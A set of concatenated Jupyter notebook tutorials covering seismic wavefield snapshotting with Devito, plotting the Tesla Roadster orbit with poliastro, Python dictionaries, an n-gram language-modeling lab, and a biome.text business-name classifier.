# float r0 = 1.0e+4F*dt*m[x + 2][y + 2] + 5.0e+3F*(dt*dt)*damp[x + 1][y + 1];
# u[t1][x + 2][y + 2] = 2.0e+4F*dt*m[x + 2][y + 2]*u[t0][x + 2][y + 2]/r0 - 1.0e+4F*dt*m[x + 2][y + 2]*u[t2][x + 2][y + 2]/r0 + 1.0e+2F*((dt*dt*dt)*u[t0][x + 1][y + 2]/r0 + (dt*dt*dt)*u[t0][x + 2][y + 1]/r0 + (dt*dt*dt)*u[t0][x + 2][y + 3]/r0 + (dt*dt*dt)*u[t0][x + 3][y + 2]/r0) + 5.0e+3F*(dt*dt)*damp[x + 1][y + 1]*u[t2][x + 2][y + 2]/r0 - 4.0e+2F*dt*dt*dt*u[t0][x + 2][y + 2]/r0;
# }
# }
# gettimeofday(&end_section0, NULL);
# timers->section0 += (double)(end_section0.tv_sec-start_section0.tv_sec)+(double)(end_section0.tv_usec-start_section0.tv_usec)/1000000;
# //<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<SAVE SNAPSHOT<<<<<<<<<<<<<<<<<<<<<
# if ((time)%(60) == 0)
# {
# struct timeval start_section1, end_section1;
# gettimeofday(&start_section1, NULL);
# for (int x = x_m; x <= x_M; x += 1)
# {
# #pragma omp simd
# for (int y = y_m; y <= y_M; y += 1)
# {
# usave[time / 60][x + 2][y + 2] = u[t0][x + 2][y + 2];
# }
# }
# //<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
# gettimeofday(&end_section1, NULL);
# timers->section1 += (double)(end_section1.tv_sec-start_section1.tv_sec)+(double)(end_section1.tv_usec-start_section1.tv_usec)/1000000;
# }
# struct timeval start_section2, end_section2;
# gettimeofday(&start_section2, NULL);
# for (int p_src = p_src_m; p_src <= p_src_M; p_src += 1)
# {
# //source injection
# //...
# }
# gettimeofday(&end_section2, NULL);
# timers->section2 += (double)(end_section2.tv_sec-start_section2.tv_sec)+(double)(end_section2.tv_usec-start_section2.tv_usec)/1000000;
# struct timeval start_section3, end_section3;
# gettimeofday(&start_section3, NULL);
# for (int p_rec = p_rec_m; p_rec <= p_rec_M; p_rec += 1)
# {
# //receivers interpolation
# //...
# }
# gettimeofday(&end_section3, NULL);
# timers->section3 += (double)(end_section3.tv_sec-start_section3.tv_sec)+(double)(end_section3.tv_usec-start_section3.tv_usec)/1000000;
# }
# return 0;
# }
#
# ```
# To inspect the full codes of `op1` and `op2`, run the block below:
# +
def print2file(filename, thingToPrint):
import sys
orig_stdout = sys.stdout
f = open(filename, 'w')
sys.stdout = f
print(thingToPrint)
f.close()
sys.stdout = orig_stdout
# print2file("op1.c", op1) # uncomment to print to file
# print2file("op2.c", op2) # uncomment to print to file
# print(op1) # uncomment to print here
# print(op2) # uncomment to print here
# -
# To run snaps as a movie (outside Jupyter Notebook), run the code below, altering `filename, nsnaps, nx, nz` accordingly:
# +
#NBVAL_IGNORE_OUTPUT
#NBVAL_SKIP
# Current cell requires ffmpeg module in order to produce and save the animation
def animateSnaps2d(nsnaps, snapsObj):
    import matplotlib.pyplot as plt
    from matplotlib import animation, rc
# Set up formatting for the movie files
Writer = animation.writers['ffmpeg']
# fps: 20 bitrate: 16000
writer = Writer(fps=20, metadata=dict(artist='Me'), bitrate=16000)
from IPython.display import HTML
base_matrix = np.transpose(snapsObj[0, :, :])
def update(i):
base_matrix = np.transpose(snapsObj[i, :, :])
matrice.set_array(base_matrix)
fig, ax = plt.subplots()
matrice = ax.matshow(base_matrix)
plt.colorbar(matrice)
plt.xlabel('x')
plt.ylabel('z')
plt.title('Modelling one shot over a 2-layer velocity model with Devito.')
# A file named `snapshotting.mp4` is saved in the current directory.
ani = animation.FuncAnimation(fig, update, frames=nsnaps, interval=500)
plt.show()
    rc('animation', html='html5')
    ani.save('snapshotting.mp4', writer=writer)
    return ani
filename = "naivsnaps.bin"
nsnaps = 100
fobj = open(filename, "rb")
snapsObj = np.fromfile(fobj, dtype=np.float32)
snapsObj = np.reshape(snapsObj, (nsnaps, vnx, vnz))
fobj.close()
anim = animateSnaps2d(nsnaps, snapsObj)
# -
# # References
#
# <NAME>., <NAME>., <NAME>., <NAME>., <NAME>., <NAME>., & <NAME>. (2017). Full-waveform inversion, Part 1: Forward modeling. The Leading Edge, 36(12), 1033-1036.
|
examples/seismic/tutorials/08_snapshotting.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Visualizing the SpaceX Tesla Roadster trip to Mars
# +
from astropy import units as u  # needed below for u.au, u.deg, u.km
from astropy.time import Time
from astropy.coordinates import solar_system_ephemeris
solar_system_ephemeris.set("jpl")
from poliastro.bodies import *
from poliastro.twobody import Orbit
from poliastro.plotting import OrbitPlotter, plot
EPOCH = Time("2018-02-18 12:00:00", scale="tdb")
# +
import callhorizons
from astropy.coordinates import ICRS, CartesianRepresentation, CartesianDifferential
from poliastro.frames import HeliocentricEclipticJ2000
def get_roadster_orbit(epoch):
# Get orbital data
roadster = callhorizons.query("SpaceX Roadster", smallbody=False)
roadster.set_discreteepochs([epoch.jd])
roadster.get_elements(center="500@10")
# Create Orbit object to do conversions
roadster_eclip = Orbit.from_classical(
Sun,
roadster['a'][0] * u.au,
roadster['e'][0] * u.one,
roadster['incl'][0] * u.deg,
roadster['node'][0] * u.deg,
roadster['argper'][0] * u.deg,
roadster['trueanomaly'][0] * u.deg,
epoch
)
# Convert to ICRS
roadster_eclip_coords = HeliocentricEclipticJ2000(
x=roadster_eclip.r[0], y=roadster_eclip.r[1], z=roadster_eclip.r[2],
v_x=roadster_eclip.v[0], v_y=roadster_eclip.v[1], v_z=roadster_eclip.v[2],
representation=CartesianRepresentation,
differential_type=CartesianDifferential,
obstime=epoch
)
roadster_icrs_coords = roadster_eclip_coords.transform_to(ICRS)
roadster_icrs_coords.representation = CartesianRepresentation
# Create final orbit
roadster_icrs = Orbit.from_vectors(
Sun,
r=[roadster_icrs_coords.x, roadster_icrs_coords.y, roadster_icrs_coords.z] * u.km,
v=[roadster_icrs_coords.v_x, roadster_icrs_coords.v_y, roadster_icrs_coords.v_z] * (u.km / u.s),
epoch=epoch
)
return roadster_icrs
# -
roadster = get_roadster_orbit(EPOCH)
roadster
from poliastro.plotting import plot_solar_system
frame = plot_solar_system(outer=False, epoch=EPOCH)
frame.plot(roadster, label="SpaceX Roadster", color='k')
# +
from poliastro.plotting import OrbitPlotter3D
from plotly.offline import init_notebook_mode
init_notebook_mode(connected=True)
# +
frame = OrbitPlotter3D()
frame.plot(Orbit.from_body_ephem(Earth), label=Earth)
frame.plot(Orbit.from_body_ephem(Mars), label=Mars)
frame.plot(roadster, label="SpaceX Roadster", color='black')
frame.set_view(30 * u.deg, -100 * u.deg, 2 * u.km)
frame.show()
|
docs/source/examples/Visualizing the SpaceX Tesla Roadster trip to Mars.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # In-Class Coding Lab: Dictionaries
#
# The goals of this lab are to help you understand:
#
# - How to use Python Dictionaries
# - Basic Dictionary methods
# - Dealing with Key errors
# - How to use lists of Dictionaries
# - How to encode / decode python dictionaries to json.
#
# ## Dictionaries are Key-Value Pairs.
#
# The **key** is unique for each entry in a Python dictionary and can be any hashable type (most commonly a `str`). The **value** stored under the key can be any Python type.
#
# This example creates a `stock` variable with two keys `symbol` and `name`. We access the dictionary key with `['keyname']`.
stock = {} # empty dictionary
stock['symbol'] = 'AAPL'
stock['name'] = 'Apple Computer'
print(stock)
print(stock['symbol'])
print(stock['name'])
# While Python lists are best suited for storing multiple values of the same type (like grades), Python dictionaries are best suited for storing hybrid values, or values with multiple attributes.
#
# In the example above we created an empty dictionary `{}` then assigned keys `symbol` and `name` as part of individual assignment statements.
#
# We can also build the dictionary in a single statement, like this:
stock = { 'name' : 'Apple Computer', 'symbol' : 'AAPL', 'value' : 125.6 }
print(stock)
print("%s (%s) has a value of $%.2f" %(stock['name'], stock['symbol'], stock['value']))
# ## Dictionaries are mutable
#
# This means we can change their value. We can add and remove keys and update the value of keys. This makes dictionaries quite useful for storing data.
# +
# let's add 2 new keys
print("Before changes", stock)
stock['low'] = 119.85
stock['high'] = 127.0
# and update the value key
stock['value'] = 126.25
print("After change", stock)
# -
# ## Now you Try It!
#
# Create a python dictionary called `car` with the following keys `make`, `model` and `price`. Set appropriate values and print out the dictionary.
#
# TODO: Write code here
car = {'make' : 'Ford', 'model' : 'Fusion', 'price' : 47389}
print(car)
# ## What Happens when the key is not there?
#
# Let's go back to our stock example. What happens when we try to read a key not present in the dictionary?
#
# The answer is that Python will report a `KeyError`
print( stock['change'] )
# No worries. We know how to handle run-time errors in Python... use `try except` !!!
try:
print( stock['change'] )
except KeyError:
print("The key 'change' does not exist!")
# ## Avoiding KeyError
#
# You can avoid `KeyError` using the `get()` dictionary method. This method will return a default value when the key does not exist.
#
# The first argument to `get()` is the key to get, the second argument is the value to return when the key does not exist.
print(stock.get('name','no key'))
print(stock.get('change', 'no key'))
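# A third option, beyond `try except` and `get()`, is to test for the key with the `in` operator before indexing:

```python
stock = {'name': 'Apple Computer', 'symbol': 'AAPL', 'value': 126.25}

# A membership test avoids the KeyError without try/except or get()
if 'change' in stock:
    print(stock['change'])
else:
    print("The key 'change' does not exist!")
```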
# ## Now You try It!
#
# Write a program to ask the user to input a key for the `stock` variable.
#
# If the key exists, print the value, otherwise print 'Key does not exist'
# +
# TODO: write code here
user_input = input("Enter a key for the stock variable: ")
print(stock.get(user_input, 'Key does not exist'))
# -
# ## Enumerating keys and values
#
# You can enumerate keys and values easily, using the `keys()` and `values()` methods:
# +
print("KEYS")
for k in stock.keys():
print(k)
print("VALUES")
for v in stock.values():
print(v)
# -
# ## Lists of Dictionaries
#
# A list of dictionaries allows us to create useful in-memory data structures. It's one of the features of Python that sets it apart from other programming languages.
#
# Let's use it to build a portfolio (list of 4 stocks).
# +
portfolio = [
{ 'symbol' : 'AAPL', 'name' : 'Apple Computer Corp.', 'value': 136.66 },
{ 'symbol' : 'AMZN', 'name' : 'Amazon.com, Inc.', 'value': 845.24 },
{ 'symbol' : 'MSFT', 'name' : 'Microsoft Corporation', 'value': 64.62 },
{ 'symbol' : 'TSLA', 'name' : 'Tesla, Inc.', 'value': 257.00 }
]
print("first stock", portfolio[0])
print("name of first stock", portfolio[0]['name'])
print("last stock", portfolio[-1])
print("value of 2nd stock", portfolio[1]['value'])
# -
# ## Putting It All Together
#
# Write a program to build out your personal stock portfolio.
#
# ```
# 1. Start with an empty list, called portfolio
# 2. loop
# 3. create a new stock dictionary
# 3. input a stock symbol, or type 'QUIT' to print portfolio
# 4. if symbol equals 'QUIT' exit loop
# 5. add symbol value to stock dictionary under 'symbol' key
# 6. input stock value as float
# 7. add stock value to stock dictionary under 'value' key
# 8. append stock variable to portfolio list variable
# 9. time to print the portfolio: for each stock in the portfolio
# 10. print stock symbol and stock value, like this "AAPL $136.66"
# ```
# +
portfolio = []
while True:
    symbol = input("Enter a stock symbol or type QUIT: ")
    if symbol.upper() == 'QUIT':
print(portfolio)
break
else:
value = float(input("Enter stock value: "))
stock = {'symbol' : symbol, 'value' : value}
portfolio.append(stock)
print(symbol, "$", value)
# -
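# ## Bonus: Dictionaries and JSON
#
# The lab goals mention encoding and decoding dictionaries to JSON, which the examples above never demonstrate. The standard-library `json` module handles both directions:

```python
import json

stock = {'name': 'Apple Computer', 'symbol': 'AAPL', 'value': 126.25}

encoded = json.dumps(stock)    # dict -> JSON string
decoded = json.loads(encoded)  # JSON string -> dict

print(encoded)
print(decoded['symbol'])
```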
|
content/lessons/10/Class-Coding-Lab/CCL-Dictionaries.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# Lab 3: Language Modeling
# =============
# In this problem set, your objective is to train a language model, evaluate it and explore how it can be used for language generation. Towards that end you will:
#
# - Train an n-gram language model.
# - Use that language model to generate representative sentences.
# - Study the effect of training data size, and language model complexity (n-gram size), on the modeling capacity of a language model.
#
# - **For this assignment, submit ```lab3.py``` on Gradescope.**
# - In order to test the lab you can run ```python run_tests.py``` or ```python run_tests.py -j``` (for more detailed information)
# - In order to install the correct dependencies you can run ```pip install -r requirements.txt```
#
# Total points: 90 points
# # 0. Setup
#
# In order to develop this assignment, you will need [python 3.6](https://www.python.org/downloads/) and the following libraries. Most if not all of these are part of [anaconda](https://www.continuum.io/downloads), so a good starting point would be to install that.
#
# - [jupyter](http://jupyter.readthedocs.org/en/latest/install.html)
# - [nosetests](https://nose.readthedocs.org/en/latest/)
# - [nltk](https://www.nltk.org)
#
# Here is some help on installing packages in python: https://packaging.python.org/installing/. You can use ```pip install --user``` to install locally without sudo. We have also provided a requirements.txt file with the correct packages and their respective versions, so you can also run ```pip install -r requirements.txt``` to install the correct dependencies.
import sys
from importlib import reload
from collections import defaultdict
import lab3
# +
print('My Python version')
print('python: {}'.format(sys.version))
# -
import nose
import nltk
# +
print('My library versions')
print('nose: {}'.format(nose.__version__))
print('nltk: {}'.format(nltk.__version__))
# -
# To test whether your libraries are the right version, run:
#
# `nosetests tests/test_environment.py`
# ! nosetests tests/test_environment.py
# # 1. Training a language model
#
# Let us first train a 3-gram language model. We need a monolingual corpus, which we will get using nltk.
#
# Total: 40 points
# Let us first extract, from nltk's reuters corpus, two corpora in two different domains (here, subject areas): the food industry and the natural resources industry.
# +
import nltk
food = ['barley', 'castor-oil', 'cocoa', 'coconut', 'coconut-oil', 'coffee', 'copra-cake', 'grain', 'groundnut', 'groundnut-oil', 'potato', 'soy-meal', 'soy-oil', 'soybean', 'sugar', 'sun-meal', 'sun-oil', 'sunseed', 'tea', 'veg-oil', 'wheat']
natural_resources = ['alum', 'fuel', 'gas', 'gold', 'iron-steel', 'lead', 'nat-gas', 'palladium', 'propane', 'tin', 'zinc']
corpus = nltk.corpus.reuters
food_corpus = corpus.raw(categories=food)
natr_corpus = corpus.raw(categories=natural_resources)
# + tags=["outputPrepend"]
print(food_corpus)
# -
# ## Tokenization
#
# Your first task is to tokenize the raw text into a list of sentences, each of which is in turn a list of words. No need for any other kind of preprocessing such as lowercasing.
#
# - **Deliverable 1.1**: Complete the function `lab3.tokenize_corpus`. (5 points)
# - **Test**: `tests/test_visible.py:test_d1_1_tk`
reload(lab3);
nltk.download('punkt')
food_corpus_tk = lab3.tokenize_corpus(food_corpus)
natr_corpus_tk = lab3.tokenize_corpus(natr_corpus)
# ## Padding
#
# Your second task is to pad your sentences with the start-of-sentence symbol `'<s>'` and end-of-sentence symbol `'</s>'`. These symbols are necessary to model the probability of words that usually start a sentence and those that usually end a sentence.
#
# - **Deliverable 1.2**: Complete the function `lab3.pad_corpus`. (5 points)
# - **Test**: `tests/test_visible.py:test_d1_2_pad`
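# A minimal sketch of the padding step, assuming each sentence is a list of tokens (the helper name `pad_sentences` is hypothetical; the real `lab3.pad_corpus` signature may differ):

```python
def pad_sentences(corpus, sos="<s>", eos="</s>"):
    # corpus: list of sentences, each a list of tokens;
    # wrap every sentence with the start/end-of-sentence symbols.
    return [[sos] + sent + [eos] for sent in corpus]
```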
reload(lab3);
food_corpus_tk_pd = lab3.pad_corpus(food_corpus_tk)
natr_corpus_tk_pd = lab3.pad_corpus(natr_corpus_tk)
# ## Train-Test Split
#
# Your third task is to split the corpora into train, for training the language model, and test, for testing the language model. We will go with the traditional 80% (train), 20% (test) split. The first `floor(0.8*num_of_tokens)` should constitute the training corpus, and the rest should constitute the test corpus.
#
# - **Deliverable 1.3**: Complete the function `lab3.split_corpus`. (5 points)
# - **Test**: `tests/test_visible.py:test_d1_3_spc`
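# A sketch of the 80/20 cut described above, operating on a flattened token list. This is a simplification; the real `lab3.split_corpus` may keep sentence boundaries intact.

```python
import math

def split_tokens_sketch(sentences, train_frac=0.8):
    # Flatten the padded sentences, then cut at floor(train_frac * num_tokens).
    tokens = [tok for sent in sentences for tok in sent]
    cut = math.floor(train_frac * len(tokens))
    return tokens[:cut], tokens[cut:]
```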
reload(lab3);
food_corpus_tr, food_corpus_te = lab3.split_corpus(food_corpus_tk_pd)
natr_corpus_tr, natr_corpus_te = lab3.split_corpus(natr_corpus_tk_pd)
# + tags=[]
# Quick sanity check: flatten the first two training sentences into a single token list
flat_list = [item for sublist in food_corpus_tr[0:2] for item in sublist]
print(food_corpus_tr[0:2])
print("\n-----\n")
print(flat_list)
# -
word_list = []
for i in food_corpus_tr[0:2]:
word_list.extend(i)
print(word_list)
# ## Splitting into n-grams
#
# Your fourth task is to count n-grams in the text up to a specific order.
#
# - **Deliverable 1.4**: Complete the function `lab3.count_ngrams`. (20 points)
# - **Test**: `tests/test_visible.py:test_d1_4_cn`
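# A hedged sketch of the counting logic, mirroring the `(ngrams, vocab)` return pair used below. The real `lab3.count_ngrams` may differ in details; here counts are keyed by n-gram tuples.

```python
from collections import defaultdict

def count_ngrams_sketch(sentences, max_order):
    # Count every n-gram of order 1..max_order and collect the vocabulary.
    counts = defaultdict(int)
    vocab = set()
    for sent in sentences:
        vocab.update(sent)
        for n in range(1, max_order + 1):
            for i in range(len(sent) - n + 1):
                counts[tuple(sent[i:i + n])] += 1
    return counts, vocab
```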
reload(lab3);
food_ngrams, food_vocab = lab3.count_ngrams(food_corpus_tr, 3)
natr_ngrams, natr_vocab = lab3.count_ngrams(natr_corpus_tr, 3)
# ## Estimating n-gram probability
#
# Your last task in this part of the problem set is to estimate the n-gram probabilities p(w_i | w_{i-n+1}, w_{i-n+2}, ..., w_{i-1}). For the purposes of this exercise we will use the maximum likelihood estimate and perform no smoothing.
#
# - **Deliverable 1.5**: Complete the function `lab3.estimate`. (5 points)
# - **Test**: `tests/test_visible.py:test_d1_5_es`
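# A sketch of the maximum likelihood estimate, matching the call pattern used below (word and context passed as token lists, counts keyed by n-gram tuples as in Deliverable 1.4; the real `lab3.estimate` may differ):

```python
def estimate_sketch(ngram_counts, word, context):
    # MLE without smoothing:
    # p(word | context) = count(context + word) / count(context)
    joint = ngram_counts.get(tuple(context) + tuple(word), 0)
    prior = ngram_counts.get(tuple(context), 0)
    return joint / prior if prior else 0.0
```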
reload(lab3);
# + tags=[]
print(lab3.estimate(food_ngrams, ['palm'], ['producer', 'of']))
print(lab3.estimate(natr_ngrams, ['basis'], ['tested', 'the']))
# -
# Application: the speech recognition task takes human voice as its input and outputs text. If the pronunciations of two words are similar, a language model can help decide which word to choose!
print(food_ngrams[('there', 'is', 'no')])
print(food_ngrams[('their', 'is', 'no')])
# Given the count of 'there is no' and 'their is no', which word ('there' or 'their') is more likely to be taken as the output?
# Language models are not only helpful in speech recognition, but also in text generation (*e.g.*, machine translation, summarization, image captioning), spelling correction and so on.
# ## Training a language model
#
# Now we will combine everything together and train our language model! One way to see what the language model has learned is to see the sentences it can generate.
#
# For the sake of simplicity, and for the purposes of later parts in this problem set, we use nltk's lm module to train a language model.
# +
from nltk.lm import Laplace
from nltk.lm.preprocessing import padded_everygram_pipeline
size_ngram = 3
food_train, food_vocab = padded_everygram_pipeline(size_ngram, food_corpus_tk[:int(0.8*len(food_corpus_tk))])
natr_train, natr_vocab = padded_everygram_pipeline(size_ngram, natr_corpus_tk[:int(0.8*len(natr_corpus_tk))])
food_test = sum([['<s>'] + x + ['</s>'] for x in food_corpus_tk[int(0.8*len(food_corpus_tk)):]],[])
natr_test = sum([['<s>'] + x + ['</s>'] for x in natr_corpus_tk[int(0.8*len(natr_corpus_tk)):]],[])
food_lm = Laplace(size_ngram)
natr_lm = Laplace(size_ngram)
food_lm.fit(food_train, food_vocab)
natr_lm.fit(natr_train, natr_vocab)
# -
reload(lab3);
# Now let's ask our language model to generate a sentence.
# This might take some time
n_words = 10
print(food_lm.generate(n_words, random_seed=3)) # random_seed makes the random sampling part of generation reproducible.
print(natr_lm.generate(n_words, random_seed=3))
# # 2. Evaluating a language model
#
# Next, we evaluate our language models using the perplexity measure, and draw conclusions on how a change of domains (here, subject areas) can affect the performance of a language model. Perplexity measures the language model capacity at predicting sentences in a test corpus.
#
# Total: 10 points
# - **Deliverable 2.1**: Complete the function `lab3.get_perplexity`. (10 points)
# - **Test**: `tests/test_visible.py:test_d2_1_gp`
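# At its core, perplexity is the exponentiated negative average log-probability per word. A sketch assuming the per-word log2-probabilities are already available (the real `lab3.get_perplexity` should instead query the nltk language model, e.g. via its `score` method):

```python
def perplexity_from_logprobs(log2_probs):
    # perplexity = 2 ** (negative average per-word log2-probability)
    avg = sum(log2_probs) / len(log2_probs)
    return 2 ** (-avg)
```

# For instance, a uniform model over 4 equally likely words assigns each word log2-probability -2, so its perplexity is exactly 4.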
reload(lab3);
# This might take some time
print(lab3.get_perplexity(food_lm, food_test[:5000]))
print(lab3.get_perplexity(food_lm, natr_test[:5000]))
print(lab3.get_perplexity(natr_lm, natr_test[:5000]))
print(lab3.get_perplexity(natr_lm, food_test[:5000]))
# - What observations can you make on the results? Is the domain shift affecting the performance of the language model? What are possible explanations?
#
# + [markdown] nbgrader={"grade": true, "grade_id": "cell-75755ce98e18d29b", "locked": false, "points": 10, "schema_version": 3, "solution": true, "task": false}
# **Your Observation**:
# -
# # 3. Data size and model complexity
#
# Let us now see how the size of the training data and the complexity of the model we choose affects the quality of our language model.
#
# Total: 40 points
# For this part we'd like to see the difference between a 2-gram model and a 3-gram model. Typically, with a larger n, the n-gram model gives us more information about the word sequence and has lower perplexity.
#
# For testing, we'll only be considering 5% instead of 20% of the test data for running time purposes.
#
# - **Deliverable 3.1**: Complete the function `lab3.vary_ngram`. (40 points)
# - **Test**: `tests/test_visible.py:test_d3_1_vary`
# + tags=[]
test_corpus = natr_corpus_tk[int(0.8*len(natr_corpus_tk)): int(0.85*len(natr_corpus_tk))][:2]
new_test = sum([['<s>'] + x + ['</s>'] for x in test_corpus], [])  # start value [] is needed when summing lists
print(test_corpus)
print("\n#####\n")
print(new_test)
# -
reload(lab3);
# +
n_gram_orders = [2, 3]
train_corpus = natr_corpus_tk[:int(0.8*len(natr_corpus_tk))]
test_corpus = natr_corpus_tk[int(0.8*len(natr_corpus_tk)): int(0.85*len(natr_corpus_tk))]
results = lab3.vary_ngram(train_corpus, test_corpus, n_gram_orders)
print(results)
# -
# However, we notice that the 3-gram language model actually performs worse than the 2-gram language model. This is due to the small size of the training corpus: a 3-gram language model is too complex a model for such a small training set. If our training data were larger, we would see the opposite. If we trained 1-gram, 2-gram, and 3-gram models on 38 million words from the Wall Street Journal, we would get perplexities of 962, 170, and 109 respectively on a test set of 1.5 million words.
# Example output of the cell above: defaultdict(None, {2: 5596.7318534048245, 3: 5625.390747181811})
# Now let's see a few examples of top frequent n-gram examples. Let's start with unigram.
# +
natr_ngrams, natr_vocab = lab3.count_ngrams(natr_corpus_tr, 3)
top_ngram = []
count = 0
for i in sorted(natr_ngrams.items(), key=lambda x: x[1], reverse=True):
if len(i[0]) == 1:
top_ngram.append(i[0])
count += 1
if count >=20:
break
print(top_ngram)
# -
# Do you think unigram captures any grammatical information? How well do you think unigram captures the language information?
#
# Now let's see bigram and trigram.
# +
top_ngram = []
count = 0
for i in sorted(natr_ngrams.items(), key=lambda x: x[1], reverse=True):
if len(i[0]) == 2:
top_ngram.append(i[0])
count += 1
if count >=20:
break
print(top_ngram)
top_ngram = []
count = 0
for i in sorted(natr_ngrams.items(), key=lambda x: x[1], reverse=True):
if len(i[0]) == 3:
top_ngram.append(i[0])
count += 1
if count >=20:
break
print(top_ngram)
# -
# Compared with unigram, bigram and trigram can capture more information.
# Bigram language model can already capture some of the grammatical information, such as 'in the', 'of the'. However, the power of bigram is still limited.
# The trigram can output more adequate short phrases such as 'ounces of gold', 'The company said', 'oil and gas'.
#
# Therefore, typically the n-gram model with a larger n contains more information about the word sequence and thus has lower perplexity. However, the tradeoff is higher computational cost and memory usage.
|
ECE365/nlp/nlplab3_dist/NLPLab3.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Training a short text classifier of German business names
# <a target="_blank" href="https://www.recogn.ai/biome-text/master/documentation/tutorials/1-Training_a_text_classifier.html"><img class="icon" src="https://www.recogn.ai/biome-text/master/assets/img/biome-isotype.svg" width=24 /></a>
# [View on recogn.ai](https://www.recogn.ai/biome-text/master/documentation/tutorials/1-Training_a_text_classifier.html)
#
# <a target="_blank" href="https://colab.research.google.com/github/recognai/biome-text/blob/master/docs/docs/documentation/tutorials/1-Training_a_text_classifier.ipynb"><img class="icon" src="https://www.tensorflow.org/images/colab_logo_32px.png" width=24 /></a>
# [Run in Google Colab](https://colab.research.google.com/github/recognai/biome-text/blob/master/docs/docs/documentation/tutorials/1-Training_a_text_classifier.ipynb)
#
# <a target="_blank" href="https://github.com/recognai/biome-text/blob/master/docs/docs/documentation/tutorials/1-Training_a_text_classifier.ipynb"><img class="icon" src="https://github.githubassets.com/images/modules/logos_page/GitHub-Mark.png" width=24 /></a>
# [View source on GitHub](https://github.com/recognai/biome-text/blob/master/docs/docs/documentation/tutorials/1-Training_a_text_classifier.ipynb)
# When running this tutorial in Google Colab, make sure to install *biome.text* first:
# !pip install -U pip
# !pip install -U git+https://github.com/recognai/biome-text.git
exit(0) # Force restart of the runtime
# *If* you want to log your runs with [WandB](https://wandb.ai/home), don't forget to install its client and log in.
# !pip install wandb
# !wandb login
# ## Introduction
#
# In this tutorial we will train a basic short-text classifier for predicting the sector of a business based only on its business name.
# For this we will use a training data set with business names and business categories in German.
# ### Imports
#
# Let us first import all the stuff we need for this tutorial:
from biome.text import Pipeline, Dataset, Trainer
from biome.text.configuration import VocabularyConfiguration, WordFeatures, TrainerConfiguration
# ## Explore the training data
#
# Let's take a look at the data we will use for training. For this we will use the [`Dataset`](https://www.recogn.ai/biome-text/master/api/biome/text/dataset.html#dataset) class that is a very thin wrapper around HuggingFace's awesome [datasets.Dataset](https://huggingface.co/docs/datasets/master/package_reference/main_classes.html#datasets.Dataset).
# We will download the data first to create `Dataset` instances.
#
# Apart from the training data we will also download an optional validation data set to estimate the generalization error.
# Downloading the dataset first
# !curl -O https://biome-tutorials-data.s3-eu-west-1.amazonaws.com/text_classifier/business.cat.train.csv
# !curl -O https://biome-tutorials-data.s3-eu-west-1.amazonaws.com/text_classifier/business.cat.valid.csv
# Loading from local
train_ds = Dataset.from_csv("business.cat.train.csv")
valid_ds = Dataset.from_csv("business.cat.valid.csv")
# Most of HuggingFace's `Dataset` API is exposed and you can checkout their nice [documentation](https://huggingface.co/docs/datasets/master/processing.html) on how to work with data in a `Dataset`. For example, let's quickly check the size of our training data and print the first 10 examples as a pandas DataFrame:
len(train_ds)
train_ds.head()
# As we can see we have two relevant columns *label* and *text*. Our classifier will be trained to predict the *label* given the *text*.
# ::: tip Tip
#
# The [TaskHead](https://www.recogn.ai/biome-text/master/api/biome/text/modules/heads/task_head.html#taskhead) of our model below will expect a *text* and a *label* column to be present in the `Dataset`. In our data set this is already the case, otherwise we would need to change or map the corresponding column names via `Dataset.rename_column_()` or `Dataset.map()`.
#
# :::
# We can also quickly check the distribution of our labels. Use `Dataset.head(None)` to return the complete data set as a pandas DataFrame:
train_ds.head(None)["label"].value_counts()
# The `Dataset` class also provides access to Hugging Face's extensive NLP datasets collection via the `Dataset.load_dataset()` method. Have a look at their [quicktour](https://huggingface.co/docs/datasets/master/quicktour.html) for more details about their awesome library.
# ## Configure your *biome.text* Pipeline
# A typical [Pipeline](https://www.recogn.ai/biome-text/master/api/biome/text/pipeline.html#pipeline) consists of tokenizing the input, extracting features, applying a language encoding (optionally) and executing a task-specific head in the end.
#
# After training a pipeline, you can use it to make predictions.
#
# As a first step we must define a configuration for our pipeline.
# In this tutorial we will create a configuration dictionary and use the `Pipeline.from_config()` method to create our pipeline, but there are [other ways](https://www.recogn.ai/biome-text/master/api/biome/text/pipeline.html#pipeline).
#
# A *biome.text* pipeline has the following main components:
#
# ```yaml
# name: # a descriptive name of your pipeline
#
# tokenizer: # how to tokenize the input
#
# features: # input features of the model
#
# encoder: # the language encoder
#
# head: # your task configuration
#
# ```
#
# See the [Configuration section](https://www.recogn.ai/biome-text/master/documentation/user-guides/2-configuration.html) for a detailed description of how these main components can be configured.
#
# Our complete configuration for this tutorial will be following:
pipeline_dict = {
"name": "german_business_names",
"tokenizer": {
"text_cleaning": {
"rules": ["strip_spaces"]
}
},
"features": {
"word": {
"embedding_dim": 64,
"lowercase_tokens": True,
},
"char": {
"embedding_dim": 32,
"lowercase_characters": True,
"encoder": {
"type": "gru",
"num_layers": 1,
"hidden_size": 32,
"bidirectional": True,
},
"dropout": 0.1,
},
},
"head": {
"type": "TextClassification",
"labels": train_ds.unique("label"),
"pooler": {
"type": "gru",
"num_layers": 1,
"hidden_size": 32,
"bidirectional": True,
},
"feedforward": {
"num_layers": 1,
"hidden_dims": [32],
"activations": ["relu"],
"dropout": [0.0],
},
},
}
# With this dictionary we can now create a `Pipeline`:
pl = Pipeline.from_config(pipeline_dict)
# ## Configure the vocabulary
#
# The default behavior of *biome.text* is to add all tokens from the training data set to the pipeline's vocabulary.
# This is done automatically when training the pipeline for the first time.
#
# If you want to have more control over this step, you can define a `VocabularyConfiguration` and pass it to the [`Trainer`](https://www.recogn.ai/biome-text/master/api/biome/text/trainer.html) later on.
